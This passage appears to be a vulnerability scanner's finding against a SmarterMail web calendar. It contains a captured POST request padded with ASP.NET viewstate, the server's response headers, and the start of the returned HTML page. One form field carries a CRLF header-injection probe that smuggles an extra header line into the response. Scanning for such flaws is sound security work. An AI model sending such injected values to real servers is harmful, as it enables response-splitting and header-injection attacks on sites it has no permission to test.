QTQIxNgIxNhFSaWdodENsaWNrYWJsZU5ldwNBbHRkAgoPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg%2fZHQ9MTAvMDIvMjAxMCZ0aW1lPTE3JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDUgUE0CMTcCMTcRUmlnaHRDbGlja2FibGVOZXcAZAINDxQrAA0PFhwFDENsaWVudEV2ZW50cw8FhQFUZWxlcmlrLldlYi5VSS5DYWxlbmRhci5DYWxlbmRhckNsaWVudEV2ZW50cywgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FggFAVIFDUNsZWFyQ2FsZW5kYXIFAVYFC1NlbGVjdE1vbnRoBQFDBQ1DbGVhckNhbGVuZGFyBQFKBQ1DbGVhckNhbGVuZGFyBRFWaWV3U2VsZWN0b3JJbWFnZQUqL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodDIuZ2lmBRZGYXN0TmF2aWdhdGlvblByZXZUZXh0ZQUERm9jRAYAgBTk2y%2fNCAUWRmFzdE5hdmlnYXRpb25OZXh0VGV4dGUFA0VWU2cFG1VzZUNvbHVtbkhlYWRlcnNBc1NlbGVjdG9yc2gFBE1heEQGAIAHReg9MQkFEk5hdmlnYXRpb25OZXh0VGV4dGUFBE1pbkQGAIBMBLe1qggFDVNlbGVjdGVkRGF0ZXMPBY8BVGVsZXJpay5XZWIuVUkuQ2FsZW5kYXIuQ29sbGVjdGlvbnMuRGF0ZVRpbWVDb2xsZWN0aW9uLCBUZWxlcmlrLldlYi5VSSwgVmVyc2lvbj0yMDEwLjIuODE3LjM1LCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPTEyMWZhZTc4MTY1YmEzZDQUKwABBgCAFOTbL81IBRJOYXZpZ2F0aW9uUHJldlRleHRlBQ5Sb3dIZWFkZXJJbWFnZQUpL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvbWlzYy9yaWdodC5naWYFC1NwZWNpYWxEYXlzDwWSAVRlbGVyaWsuV2ViLlVJLkNhbGVuZGFyLkNvbGxlY3Rpb25zLkNhbGVuZGFyRGF5Q29sbGVjdGlvbiwgVGVsZXJpay5XZWIuVUksIFZlcnNpb249MjAxMC4yLjgxNy4zNSwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj0xMjFmYWU3ODE2NWJhM2Q0FCsAAA8WBh4EU2tpbgUMU21hcnRlclRvb2xzHhNFbmFibGVFbWJlZGRlZFNraW5zaB4XRW5hYmxlQWpheFNraW5SZW5kZXJpbmdoZGQWBB4IQ3NzQ2xhc3MFC3JjTWFpblRhYmxlHgRfIVNCAgIWBB8MBQxyY090aGVyTW9udGgfDQICZBYEHwwFCnJjU2VsZWN0ZWQfDQICZBYEHwwFCnJjRGlzYWJsZWQfDQICFgQfDAUMcmNPdXRPZlJhbmdlHw0CAhYEHwwFCXJjV2Vla2VuZB8NAgIWBB8MBQdyY0hvdmVyHw0CAhYEHwwFNlJhZENhbGVuZGFyTW9udGhWaWV3IFJhZENhbGVuZGFyTW9udGhWaWV3X1NtYXJ0ZXJUb29scx8NAgIWBB8MBQlyY1ZpZXdTZWwfDQICZAILD2QWAgIDD2QWAgIBD2QWAmYPZBYCAgEPDxYCHwVlZGQYBgUXY3RsMDAkVFBIJHRzVGFicyR0YWJBbGwPMs0LAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAA5NRU5VX0FsbEV2ZW50cwH1%2f%2f%2f%2f%2fP%2f%2f%2fwYMAAAACFNlbGVjdGVkCAEAAfP%2f%2f%2f%2f8%2f%2f%2f%2fBg4AAAAKUGFnZVZpZXdJRAoLZAUaY3RsMDAkVFBIJHRzVGFicyR0YWJXZWVrbHkPMsYLAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAdAV2Vla2x5AfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lECgtkBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WBQUUY3RsMDAkTVBIJGJ0bk5hdkxlZnQFFWN0bDAwJE1QSCRidG5OYXZSaWdodAUVY3RsMDAkTVBIJGJ0bkNhbFBvcHVwBRdjdGwwMCRNUEgkY2FsRGF0ZVBpY2tlcgUXY3RsMDAkTVBIJGNhbERhdGVQaWNrZXIFGWN0bDAwJFRQSCR0c1RhYnMkdGFiRGFpbHkPMsULAAEAAAD%2f%2f%2f%2f%2fAQAAAAAAAAAEAQAAAOIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuRGljdGlvbmFyeWAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQQAAAAHVmVyc2lvbghDb21wYXJlcghIYXNoU2l6ZQ1LZXlWYWx1ZVBhaXJzAAMAAwiSAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLkdlbmVyaWNFcXVhbGl0eUNvbXBhcmVyYDFbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dCOYBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dW10FAAAACQIAAAAHAAAACQMAAAAEAgAAAJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0AAAAABwMAAAAAAQAAAAUAAAAD5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0E%2fP%2f%2f%2f%2bQBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuS2V5VmFsdWVQYWlyYDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dAgAAAANrZXkFdmFsdWUBAgYFAAAAB0VuYWJsZWQIAQEB%2bv%2f%2f%2f%2fz%2f%2f%2f8GBwAAAARUZXh0CgH4%2f%2f%2f%2f%2fP%2f%2f%2fwYJAAAAClJlc291cmNlSUQGCgAAAAZARGFpbHkB9f%2f%2f%2f%2fz%2f%2f%2f8GDAAAAAhTZWxlY3RlZAgBAAHz%2f%2f%2f%2f%2fP%2f%2f%2fwYOAAAAClBhZ2VWaWV3SUQKC2QFG2N0bDAwJFRQSCR0c1RhYnMkdGFiTW9udGhseQ8yxwsAAQAAAP%2f%2f%2f%2f8BAAAAAAAAAAQBAAAA4gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5EaWN0aW9uYXJ5YDJbW1N5c3RlbS5TdHJpbmcsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV0sW1N5c3RlbS5PYmplY3QsIG1zY29ybGliLCBWZXJzaW9uPTIuMC4wLjAsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49Yjc3YTVjNTYxOTM0ZTA4OV1dBAAAAAdWZXJzaW9uCENvbXBhcmVyCEhhc2hTaXplDUtleVZhbHVlUGFpcnMAAwADCJIBU3lzdGVtLkNvbGxlY3Rpb25zLkdlbmVyaWMuR2VuZXJpY0VxdWFsaXR5Q29tcGFyZXJgMVtbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0I5gFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV1bXQUAAAAJAgAAAAcAAAAJAwAAAAQCAAAAkgFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5HZW5lcmljRXF1YWxpdHlDb21wYXJlcmAxW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQAAAAAHAwAAAAABAAAABQAAAAPkAVN5c3RlbS5Db2xsZWN0aW9ucy5HZW5lcmljLktleVZhbHVlUGFpcmAyW1tTeXN0ZW0uU3RyaW5nLCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldLFtTeXN0ZW0uT2JqZWN0LCBtc2NvcmxpYiwgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWI3N2E1YzU2MTkzNGUwODldXQT8%2f%2f%2f%2f5AFTeXN0ZW0uQ29sbGVjdGlvbnMuR2VuZXJpYy5LZXlWYWx1ZVBhaXJgMltbU3lzdGVtLlN0cmluZywgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XSxbU3lzdGVtLk9iamVjdCwgbXNjb3JsaWIsIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5XV0CAAAAA2tleQV2YWx1ZQECBgUAAAAHRW5hYmxlZAgBAQH6%2f%2f%2f%2f%2fP%2f%2f%2fwYHAAAABFRleHQKAfj%2f%2f%2f%2f8%2f%2f%2f%2fBgkAAAAKUmVzb3VyY2VJRAYKAAAACEBNb250aGx5AfX%2f%2f%2f%2f8%2f%2f%2f%2fBgwAAAAIU2VsZWN0ZWQIAQAB8%2f%2f%2f%2f%2fz%2f%2f%2f8GDgAAAApQYWdlVmlld0lECgtkBRxjdGwwMCRNUEgkY2FsQWxsJGdyZEFsbEFwcHRzDwUkVHJ1ZXxUcnVlfHxGYWxzZXxUcnVlfHxGYWxzZXxGYWxzZXwwZLwfQnwQUZfZixLmqDlJaLCPIvCW&ctl00_TitleBar_menuCalendarSourceTitle_menuCalendarSource_menuSourceSelf_CB=%0D%0Ans:+netsparker056650=vuln&ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterRecurring_CB=on&ctl00_BPH_menuCalendar_menuCalView_menuCalFilter_menuCalFilterAllDay_CB=on&ctl00%24BrPH%24searchBar%24FilterBox=Search...&ctl00%24TPH%24tsTabs%24SelectedTab=ctl00_TPH_tsTabs_tabAll&ctl00_MPH_calDatePicker_SD=%5b%5b2010%2c10%2c2%5d%5d&ctl00_MPH_calDatePicker_AD=%5b%5b1980%2c1%2c1%5d%2c%5b2099%2c12%2c30%5d%2c%5b2010%2c10%2c2%5d%5d&ctl00%24MPH%24hfNewDate=1&ctl00%24MPH%24MenuID=1

Injection Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 09:12:07 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 2563
Connection: Close


Identification Response

HTTP/1.0 200 OK
Server: SmarterTools/2.0.3925.24451
Date: Sun, 03 Oct 2010 13:12:13 GMT
X-AspNet-Version: 2.0.50727
Content-Encoding:
X-Compressed-By: HttpCompress
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 14089
Connection: Close




<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">
<head id="ctl00_Head1"><title>
My Calendar - hoytllc.com - SmarterMail
</title><meta http-equiv="Page-Enter" content="blendTrans(Duration=0)" /><meta http-equiv="Page-Exit" content="blendTrans(Duration=0)" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Popup/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Main/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Mail/&amp;rtl=false" rel="stylesheet" type="text/css" /><link href="/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&amp;fileMask=Telerik&amp;rtl=false" rel="stylesheet" type="text/css" />
<!--[if lte IE 6]>
<style type="text/css">@import '/App_Themes/Default/CSS/StyleSheet.ashx?guid=1CB60CF5B830100_1.6.3925.24513_7.2.3925.24521&fileMask=BrowserOverrides/ie6&rtl=false';</style>
<![endif]-->
<link href="/WebResource.axd?d=zpx5ZPr_A4Xj1BaWRse8fIv63FDK5xX5aVnnyKmjTOWIp31Dymcy2GN7xJML4YReWQB5iODd6AcWlBiYBjbFSA2&amp;t=634214510020000000" type="text/css" rel="stylesheet" class="Telerik_stylesheet" /><meta http-equiv="cache-control" content="no-cache"><meta http-equiv="pragma" content="no-cache"></head>
<body class="" dir="ltr">
<form method="post" action="frmCalendar.aspx" id="aspnetForm">
<div>
<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />
<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKMTE0MTU5OTM3NQ8WCB4IX19fVGl0bGUFC015IENhbGVuZGFyHhBfX19SZXN1bHRGYWlsdXJlZR4QX19fUmVzdWx0U3VjY2Vzc2UeB19fc3RhdGUyjgUAAQAAAP////8BAAAAAAAAAAwCAAAAT1NNV2ViLCBWZXJzaW9uPTcuMi4zOTI1LjI0NTIxLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWMzOWQzMzQ4NjU2ZTUxNmMMAwAAAFlSZW1vdGVJbnRlcmZhY2UsIFZlcnNpb249Ny4yLjM5MjUuMjQ1MTIsIEN1bHR1cmU9bmV1dHJhbCwgUHVibGljS2V5VG9rZW49YzM5ZDMzNDg2NTZlNTE2YwUBAAAAKlNNV2ViLkhlbHBlckNsYXNzZXMuQ2FsZW5kYXIuQ2FsZW5kYXJTdGF0ZQoAAAAER3VpZAxTZWFyY2hTdHJpbmcIQ2F0ZWdvcnkNU2hvd1JlY3VycmluZwpTaG93QWxsRGF5BE1vZGUORm9jdXNlZERhdGVVVEMRUmVzb3VyY2VPd25lclVzZXISUmVzb3VyY2VPd25lckVtYWlsA1NDRAEBAQAABAABAQQBASlTTVdlYi5IZWxwZXJDbGFzc2VzLkNhbGVuZGFyLkNhbGVuZGFyTW9kZQIAAAANPFNtYXJ0ZXJUb29scy5TbWFydGVyTWFpbC5SZW1vdGluZy5TaGFyaW5nLlNoYXJlQ29ubmVjdG9yRGF0YQMAAAACAAAABgQAAAAgNjhiNTM3MmIyMTAyNDZmNTgyZTA1ZmVjMmYxY2Y5NjYGBQAAAAAJBQAAAAEBBfr///8pU01XZWIuSGVscGVyQ2xhc3Nlcy5DYWxlbmRhci5DYWxlbmRhck1vZGUBAAAAB3ZhbHVlX18ACAIAAAAAAAAAYHZvp6wwzUgGBwAAAAVkdW1teQYIAAAAEWR1bW15QGhveXRsbGMuY29tCgsWAmYPZBYCAgEPZBYMAgMPZBYEAgEPZBYCAgEPZBYCZg9kFgICAQ9kFgQCAQ9kFgRmDxYCHgdWaXNpYmxlaGQCAQ8WAh8EaGQCAg9kFgJmD2QWAmYPFgIfBGdkAgMPZBYCAgEPZBYCAgEPDxYCHgRUZXh0BQlTZWFyY2guLi5kZAIEDxYEHgVzdHlsZQUNZGlzcGxheTpub25lOx8EaGQCBg8WAh8EaGQCBw9kFgJmD2QWAgIBDxYCHwRoFgICAQ8WAh8FZWQCCQ9kFgICAw9kFgJmD2QWCAIBD2QWAmYPZBYIZg9kFgICAQ8PFgIeCEltYWdlVXJsBSsvQXBwX1RoZW1lcy9EZWZhdWx0L0ltYWdlcy9NaXNjL05hdkxlZnQucG5nZGQCAQ9kFgICAQ8PFgIfBwUsL0FwcF9UaGVtZXMvRGVmYXVsdC9JbWFnZXMvTWlzYy9OYXZSaWdodC5wbmdkZAICD2QWAgIBDw8WAh8FBRpTYXR1cmRheSwgT2N0b2JlciAwMiwgMjAxMGRkAgMPZBYCAgEPDxYCHwcFMi9BcHBfVGhlbWVzL0RlZmF1bHQvSW1hZ2VzLzE2eDE2L0NhbGVuZGFyTW9udGguZ2lmZGQCAw8WAh8EaGQCBw8PFgIfBGdkFgQCAQ8WAh8EaGQCAw8WAh4LXyFJdGVtQ291bnQCChYUAgEPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5SS9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTgmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEOCBBTQE4ATgRUmlnaHRDbGlja2FibGVOZXcDQWx0ZAICD2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUkvTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT05JnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBDkgQU0BOQE5EVJpZ2h0Q2xpY2thYmxlTmV3AGQCAw9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTAmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UFMTAgQU0CMTACMTARUmlnaHRDbGlja2FibGVOZXcDQWx0ZAIED2QWAmYPFQcTQ2FsZW5kYXJCdXNpbmVzc0RheUovTWFpbi9DYWxlbmRhci9mcm1FdmVudC5hc3B4P2R0PTEwLzAyLzIwMTAmdGltZT0xMSZ1c2VyPWR1bW15Jm1hcHBlZD1mYWxzZQUxMSBBTQIxMQIxMRFSaWdodENsaWNrYWJsZU5ldwBkAgUPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTEyJnVzZXI9ZHVtbXkmbWFwcGVkPWZhbHNlBTEyIFBNAjEyAjEyEVJpZ2h0Q2xpY2thYmxlTmV3A0FsdGQCBg9kFgJmDxUHE0NhbGVuZGFyQnVzaW5lc3NEYXlKL01haW4vQ2FsZW5kYXIvZnJtRXZlbnQuYXNweD9kdD0xMC8wMi8yMDEwJnRpbWU9MTMmdXNlcj1kdW1teSZtYXBwZWQ9ZmFsc2UEMSBQTQIxMwIxMxFSaWdodENsaWNrYWJsZU5ldwBkAgcPZBYCZg8VBxNDYWxlbmRhckJ1c2luZXNzRGF5Si9NYWluL0NhbGVuZGFyL2ZybUV2ZW50LmFzcHg/ZHQ9MTAvMDIvMjAxMCZ0aW1lPTE0JnVzZXI9ZHVt